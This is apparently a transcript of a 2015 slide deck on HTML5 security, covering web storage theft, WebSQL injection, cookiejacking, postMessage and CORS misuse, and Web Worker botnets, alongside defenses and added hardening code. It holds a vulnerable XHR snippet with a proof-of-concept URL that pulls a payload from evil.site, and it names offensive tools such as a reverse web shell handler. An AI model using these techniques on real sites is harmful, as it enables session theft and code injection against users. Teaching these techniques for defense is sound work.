Talk about HTML5 security

Posted on 09-Jul-2015


TRANSCRIPT

youstar@insight-labs

Introduction to HTML5

HTML5 threat model

Vulnerabilities & Defense

Tools

Reference

History

HTML 1.0: 1993.6, not a standard

HTML 2.0: 1995.11, RFC 1866

HTML 3.2: 1996.1.14, W3C Recommended Standard

HTML 4.0: 1997.12.18, W3C Recommended Standard

HTML 4.01: 1999.12.24, W3C Recommended Standard

XHTML: 2000.1.20, W3C Recommended Standard

HTML5: 2008, first draft standard; 2012, W3C Candidate Recommendation

Features

The three aspects of HTML5

Content: HTML (new tags and attributes)

Presentation of content: CSS

Interaction with content: JavaScript (new APIs such as drag and drop, localStorage, Web Workers, etc.)

Features

XSS abuse with tags and attributes

Hiding URL Code

Stealing from the storage

Injecting and Exploiting WebSQL

ClickJacking && CookieJacking

Cross Origin Request and postMessage

Client‐side File Includes

Botnet and widgets

In:

New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>

New attributes for tags: autocomplete, autofocus, pattern (yes, a regex) for input

New media events

New <canvas> tag for 2D rendering

New form controls for date and time

Geolocation

New selectors

Client-side storage including localStorage, sessionStorage, and WebSQL

Out:

Presentation elements such as <font>, <center>

Presentation attributes including align, border

<frame>, <frameset>

<applet>

Old special effects: <marquee>, <bgsound>

<noscript>

Attack:

New XSS Vector

Bypass Black-list Filter

Defense:

Add new tags to Black-list

Change Regex

DOM

window.history.back();
window.history.forward();
window.history.go();

HTML5

history.pushState(state object, title, URL);
history.replaceState(): the same as pushState, but modifies the current history entry.

Type

LocalStorage: for long-term storage

SessionStorage: for the session (lasts until the browser is closed)

Differences

Cookies: 4k

LocalStorage / SessionStorage: depends on browser (usually 5MB)

Support

Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50

Function

(localStorage | sessionStorage).setItem()
(localStorage | sessionStorage).getItem()
(localStorage | sessionStorage).removeItem()
(localStorage | sessionStorage).clear()

Attack

Get the data from the storage (cookie, passwd, etc.)

Store your XSS shellcode

No path restriction (unlike cookies, storage is shared by the whole origin)

Defense

Don’t store sensitive data in local storage

Don't use local storage for session identifiers

Stick with cookies and use the HttpOnly and Secure flags

Database Storage

The same as Google Gears

Operate

var db = openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");
db.transaction(function (tx) {
  tx.executeSql("YOUR SQL STATEMENT HERE");
});

Type

SQLite (supported by WebKit)

Attack

Store shellcode

SQL injection

Defense

Be strict with SQL operations (use parameterised statements)

Encode the SQL result before display

Don't store sensitive data

Store shellcode

SQL Injection

Use sqlite_master:

SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()

Select with ?

executeSql("SELECT name FROM stud WHERE id=" + input_id);    // False: string concatenation, injectable
executeSql("SELECT name FROM stud WHERE id=?", [input_id]);  // True: parameterised

Drag and drop basics: drag data, the drag feedback image, drag effects

Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend

ClickJacking

XSS + Drag

CookieJacking

Uses several techniques together to steal the user's local cookies

Technology

How to read the local file: iframe + file://

How to detect the state of cookies: Clickjacking

How to send cookies: SMB

Defense

Use iframe with sandbox

Frame busting:

if (top !== window) top.location = window.location.href;
if (top != self) top.location.href = self.location.href;

postMessage

Send

otherWindow.postMessage(message, targetOrigin);

Receive

window.addEventListener("message", receiveMessage, false);

function receiveMessage(event) {
  if (event.origin !== "http://example.org:8080")
    return;
  // ...
}

Defense

Check the postMessage origin

Don't use innerHTML

element.innerHTML = e.data;    // dangerous
element.textContent = e.data;  // safe

Don't use eval to deal with the message
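As an added example (not code from the talk), the receiver and sender defenses above written out so they run outside a browser; the trusted origin is the one from the slide's check, and the element and window stubs are assumptions standing in for the DOM.

```javascript
"use strict";

// Added example, not code from the talk. Only this origin may talk to the page;
// the value is taken from the slide's receiveMessage() check.
const TRUSTED_ORIGINS = new Set(["http://example.org:8080"]);

// Exact comparison of the whole origin (scheme + host + port). A substring
// test such as origin.indexOf("example.org") !== -1 would also accept
// http://example.org.evil.test, so no partial matching is done here.
function isTrustedOrigin(origin, trusted = TRUSTED_ORIGINS) {
  return typeof origin === "string" && trusted.has(origin);
}

// Receiver side. Returns the rendered text, or null when the message is dropped.
// The target is written with textContent so markup in e.data stays inert text
// instead of being parsed, as it would be with innerHTML.
function receiveMessage(event, target) {
  if (!isTrustedOrigin(event.origin)) return null;
  if (typeof event.data !== "string") return null; // never eval() or blindly parse
  target.textContent = event.data;
  return target.textContent;
}

// Sender side. A targetOrigin of "*" delivers the message to whatever document
// currently occupies otherWindow, so it is refused here.
function sendMessage(otherWindow, message, targetOrigin) {
  if (targetOrigin === "*") {
    throw new Error("refusing to post with targetOrigin '*'");
  }
  otherWindow.postMessage(message, targetOrigin);
  return targetOrigin;
}

// Minimal stand-ins (assumptions) for a DOM element and a window, so the logic
// above can run under Node.
function makeElement() {
  return { textContent: "", innerHTML: "" };
}
function makeWindow() {
  const sent = [];
  return { sent, postMessage: (msg, origin) => sent.push({ msg, origin }) };
}
```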

Cross-Origin Resource Sharing

Originally Ajax calls were subject to the Same Origin Policy

Site A cannot make XMLHttpRequests to Site B

HTML5 makes it possible to make these cross domain calls

Site A -> Site B (the response must include a header)

Access-Control-Allow-Origin: Site A (required)

Access-Control-Allow-Credentials: true | false

Access-Control-Expose-Headers:

etc.

Defense

Don't set this: Access-Control-Allow-Origin: *

(compare Flash crossdomain.xml)

Prevent DDoS

if (origin == "Site A") header("Access-Control-Allow-Origin: Site A"); ... // process request
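An added example, not from the talk, of the origin check sketched above as it is done on the server: an exact allowlist match beside the reflecting pattern the slide warns against. The allowlisted origins are constructed values.

```javascript
"use strict";

// Added example, not code from the talk: the server-side check the slide
// sketches as  if (origin == "Site A") header("Access-Control-Allow-Origin: Site A").
// The allowlisted origins are constructed sample values.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Weak variant, kept for contrast: echoes whatever Origin the request carried and
// also allows credentials, which amounts to "*" plus cookies. Any site can then
// read the authenticated response of a logged-in visitor.
function corsHeadersReflecting(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened variant: normalise the Origin header through the URL parser and
// accept only an exact allowlist match. Prefix or substring tests would accept
// https://app.example.com.evil.test, so they are deliberately not used.
// Returns the CORS response headers to add, or {} to send none.
function corsHeaders(requestOrigin, allowed = ALLOWED_ORIGINS) {
  if (typeof requestOrigin !== "string" || requestOrigin === "null") {
    return {}; // no Origin header, or the opaque origin of a sandboxed iframe / file://
  }
  let origin;
  try {
    origin = new URL(requestOrigin).origin; // lower-cases the host, drops default ports
  } catch {
    return {}; // not a parsable origin
  }
  if (!allowed.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    // The value depends on the request, so shared caches must key on Origin.
    "Vary": "Origin",
  };
}
```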

Code like this:

<html><body><script>
x = new XMLHttpRequest();
x.open("GET", location.hash.substring(1));
x.onreadystatechange = function () {
  if (x.readyState == 4)
    document.getElementById("main").innerHTML = x.responseText;
};
x.send();
</script>
<div id="main"></div>
</body></html>

POC

Introducing Cross Origin Requests: http://example.com/#http://evil.site/payload.php

Contents of 'payload.php' will be included as HTML within <div id="main"></div>

New type of XSS!!
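An added example, not from the talk: the fragment resolver from the vulnerable code above beside a hardened one that confines the include to same-origin partials under an assumed directory. DOCUMENT_ORIGIN and ALLOWED_PREFIX are constructed values.

```javascript
"use strict";

// Added example, not code from the talk. DOCUMENT_ORIGIN and ALLOWED_PREFIX are
// constructed assumptions standing in for the page's real origin and the
// directory of static partials it is allowed to pull in.
const DOCUMENT_ORIGIN = "http://example.com";
const ALLOWED_PREFIX = "/fragments/";

// Vulnerable resolver, exactly what the slide's code does: the text after '#'
// is handed to XMLHttpRequest unchanged, so a link ending in
// #http://evil.site/payload.php makes the page fetch and render foreign HTML.
function resolveIncludeUnsafe(hash) {
  return hash.substring(1);
}

// Hardened resolver: parse the fragment relative to the document origin, then
// require a same-origin URL whose path stays under ALLOWED_PREFIX.
// Returns the URL to fetch, or null when the value must be refused.
function resolveInclude(hash, documentOrigin = DOCUMENT_ORIGIN) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  if (raw === "") return null;
  let url;
  try {
    url = new URL(raw, documentOrigin + "/");
  } catch {
    return null;
  }
  // Absolute http(s) URLs to other hosts, protocol-relative "//evil.site/..."
  // and "javascript:" values all resolve to a different (or opaque) origin.
  if (url.origin !== documentOrigin) return null;
  // The URL parser has already collapsed "..", so a prefix test is enough to
  // keep "/fragments/../admin.html" out.
  if (!url.pathname.startsWith(ALLOWED_PREFIX)) return null;
  url.search = "";
  url.hash = "";
  return url.href;
}
```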

Web Workers

Running scripts in the background, independently of the page

Very simple:

var w = new Worker("some_script.js");
w.onmessage = function (e) { /* do something */ };
w.terminate();

Can access: XHR, the navigator object, the application cache, and can spawn other workers!

Can't access: DOM, window, document objects

Attack

Botnet

Application‐level DDoS attacks

Email Spam

Distributed password cracking

Network Scanning

Guessing User’s Private IP Address

Identify the user’s subnet

Identify the IP address

COR + XSS + Workers = Shell of the Future

HTML5CSdump

Uses the enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name

JS-Recon

Port scans

Network scans

Detecting private IP address

Imposter

Steal cookies

Set cookies

Steal Local Shared Objects

Steal stored passwords from Firefox

etc.

Shell of the Future

Reverse Web Shell handler

Bypass anti-session hijacking measures

Ravan

JavaScript based Distributed Computing system

Hashing algorithms: MD5, SHA1, SHA256, SHA512

Reference

New Security Threats Brought by HTML5 (HTML5 带来的新安全威胁): xisigr
Attacking with HTML5: lavakumark
Abusing HTML5: Ming Chow
HTML5 Web Security: Thomas Röthlisberger
Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
Cookiejacking: Rosario Valotta
http://heideri.ch/jso/#html5
http://www.wooyun.org/bugs/wooyun-2011-02351
http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
http://www.html5test.com
http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
http://code.google.com/intl/zh-CN/apis/gears/api_database.html
http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
http://www.w3.org/TR/access-control/
http://m-austin.com/blog/?p=19
https://developer.mozilla.org/en/
http://www.w3.org/TR/cors/
http://www.andlabs.org/tools/ravan.html
http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/

Contact Me

Email: youstar@foxmail.com

Site:

www.codesec.info

www.insight-labs.org
